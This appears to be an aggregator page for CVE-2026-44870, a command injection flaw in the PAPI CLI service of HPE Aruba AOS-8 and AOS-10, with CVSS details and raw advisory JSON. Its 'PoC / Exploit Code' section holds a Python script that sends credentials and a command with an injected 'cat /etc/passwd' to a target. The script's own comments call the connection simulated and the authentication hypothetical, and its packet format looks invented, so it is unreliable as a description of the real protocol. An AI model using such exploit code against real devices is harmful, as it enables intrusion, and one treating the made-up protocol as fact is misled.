Security Vulnerability Report
CVE-2026-44870 CVSS 7.2 HIGH


Published: 2026-05-12 20:16:46
Last Modified: 2026-05-12 20:16:46

Description

Command injection vulnerabilities exist in the command line interface (CLI) service accessed by the PAPI protocol of AOS-8 and AOS-10 Operating Systems. Successful exploitation of these vulnerabilities could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HPE Aruba AOS-8 (specific versions)
HPE Aruba AOS-10 (specific versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

# Proof of Concept for CVE-2026-44870
# Target: HPE Aruba AOS-8 / AOS-10 via PAPI
# Note: Requires valid high-privileged credentials

def exploit(target_ip, target_port, credentials, injected_cmd):
    # Simulate PAPI connection
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))

        # Hypothetical Authentication Step
        auth_packet = f"AUTH {credentials}\n"
        s.send(auth_packet.encode())

        # Construct malicious CLI command
        # Appending injection string to execute OS command
        payload = f"show system status; {injected_cmd}; #"
        exploit_packet = f"CLI_CMD {payload}\n"
        s.send(exploit_packet.encode())

        response = s.recv(4096)
        print("[+] Command output:")
        print(response.decode())
        s.close()
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    # Example usage
    target = "192.168.1.100"
    port = 8211  # Common PAPI port
    creds = "admin:password"
    cmd = "cat /etc/passwd"
    exploit(target, port, creds, cmd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44870", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:45.690", "lastModified": "2026-05-12T20:16:45.690", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Command injection vulnerabilities exist in the command line interface (CLI) service accessed by the PAPI protocol of AOS-8 and AOS-10 Operating Systems. Successful exploitation of these vulnerabilities could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}